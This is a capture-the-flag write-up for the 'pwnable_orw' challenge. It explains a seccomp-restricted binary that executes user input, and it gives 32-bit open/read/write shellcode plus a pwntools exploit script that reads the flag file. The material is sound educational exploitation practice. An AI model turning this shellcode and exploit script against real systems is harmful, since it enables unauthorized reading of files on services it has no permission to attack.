
(Shellcode)pwnable_orw

2023/10/31

(原来还有orw这个东西

[shellcode]pwnable_orw

int __cdecl main(int argc, const char **argv, const char **envp)
{
// Installs the seccomp filter; its body is not shown in this listing. Per the
// write-up it leaves only open/read/write reachable, which is why an
// execve("/bin/sh")-style payload is useless here and the shellcode must
// open-read-write the flag itself.
orw_seccomp();
printf("Give my your shellcode:");
// Reads up to 0xC8 (200) bytes from stdin straight into the global `shellcode`
// buffer -- this is the payload size limit. There is no overflow to find: the
// program hands control to the bytes directly on the next line.
read(0, &shellcode, 0xC8u);
// Casts the buffer to a function pointer and calls it. This only executes
// because the buffer's page is executable (the write-up states NX is off);
// no return address needs to be overwritten. Nothing brings execution back
// here cleanly unless the shellcode arranges it.
((void (*)(void))shellcode)();
return 0;
}

1. 程序通过 seccomp 过滤的是系统调用（而不是函数），只放行 open、read、write，因此常见的 execve("/bin/sh") 一类 shellcode 会在进入内核时被直接杀掉；2. 程序没有开启 NX，而且 main 直接把读入的缓冲区当作函数指针调用，所以不需要覆盖返回地址，读入的 shellcode 会原样执行（比一般的 ret2shellcode 更直接）。orw 类题目的 shellcode 流程比较固定：open 打开 flag 文件 → read 读到缓冲区 → write 输出到 stdout。

sys_open("flag", 0 /* O_RDONLY */, 0)：返回的文件描述符在 eax 中

push 0x0 # NUL terminator; pushed first so it lands at the higher address, right after the 4 string bytes
push 0x67616c66 # 'flag' -- little-endian, so the bytes in memory are 66 6c 61 67 = "flag"
mov ebx,esp # arg0: pathname = esp, which now points at "flag\0" on the stack
xor ecx,ecx # arg1: flags = 0 (O_RDONLY)
xor edx,edx # arg2: mode = 0 (only meaningful with O_CREAT)
mov eax,0x5 # syscall number 5 = open on 32-bit Linux
int 0x80 # sys_open("flag", 0, 0); the resulting fd (or a negative errno) is returned in eax

sys_read(fd, buf, 0x100)：fd 是 open 的返回值（0/1/2 已被标准输入、输出、错误占用，本题里通常是 3，但更稳妥的是直接用 eax），buf 复用栈上存放 "flag" 字符串的位置

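mov ecx,ebx; # arg1: buf = the stack slot that held "flag\0" (reused as the read buffer; the 0x100-byte read overwrites the stack above it, which is fine because this shellcode never returns)
mov ebx,eax; # arg0: fd = open()'s return value, taken from eax instead of assuming it is 3
mov eax,0x3; # syscall number 3 = read on 32-bit Linux (set after ebx so open's result is not clobbered first)
mov edx,0x100; # arg2: count
int 0x80; # sys_read(fd, buf, 0x100); the number of bytes read is returned in eax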

sys_write(1, buf, len)：buf 沿用 read 时放在 ecx 里的缓冲区指针，len 取自 edx
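mov edx,eax; # arg2: count = the number of bytes read() just returned, so only the flag is written (not a fixed 0x100/0x30)
mov eax,0x4; # syscall number 4 = write on 32-bit Linux (set after edx so read's result is not clobbered first)
mov ebx,0x1; # arg0: fd = 1 (stdout)
int 0x80; # sys_write(1, buf, n); ecx still holds the buffer pointer from the read, so it needs no reassignment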

32 位 Linux 的系统调用号和参数寄存器可以查这张表：
<https://syscalls32.paolostivanin.com>
from pwn import *
from LibcSearcher import *

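context(os = "linux", arch = "i386", log_level= "debug")
context.terminal = ['gnome-terminal', '-x', 'sh', '-c']
#p = remote("node3.buuoj.cn", 27008)

p = process('./orw')
gdb.attach(p)

# open("flag", O_RDONLY, 0): build "flag\0" on the stack (0x67616c66 is the
# little-endian encoding of the bytes 'f','l','a','g'), ebx = pointer,
# ecx = flags 0, edx = mode 0. The fd comes back in eax.
shellcode = asm('push 0x0;push 0x67616c66;mov ebx,esp;xor ecx,ecx;xor edx,edx;mov eax,0x5;int 0x80')
# read(fd, buf, 0x100): take the fd from open's return value instead of
# assuming it is 3, and reuse the string's stack slot as the buffer
# (the read clobbers the stack above it, which is harmless since the
# shellcode never returns).
shellcode += asm('mov ecx,ebx;mov ebx,eax;mov eax,0x3;mov edx,0x100;int 0x80')
# write(1, buf, n): ecx still points at the buffer; n is read's return value.
shellcode += asm('mov edx,eax;mov eax,0x4;mov ebx,0x1;int 0x80')

# main reads at most 0xC8 bytes into the buffer it then executes.
assert len(shellcode) <= 0xC8, "shellcode does not fit in the 0xC8-byte read"

# send, not sendline: main executes exactly the bytes it read, so a trailing
# '\n' would become the first instruction after the final int 0x80. Execution
# still falls through after the write; a clean exit would need an exit syscall,
# which works only if the (unseen) seccomp filter permits it.
p.sendafter(b'shellcode:', shellcode)

p.interactive()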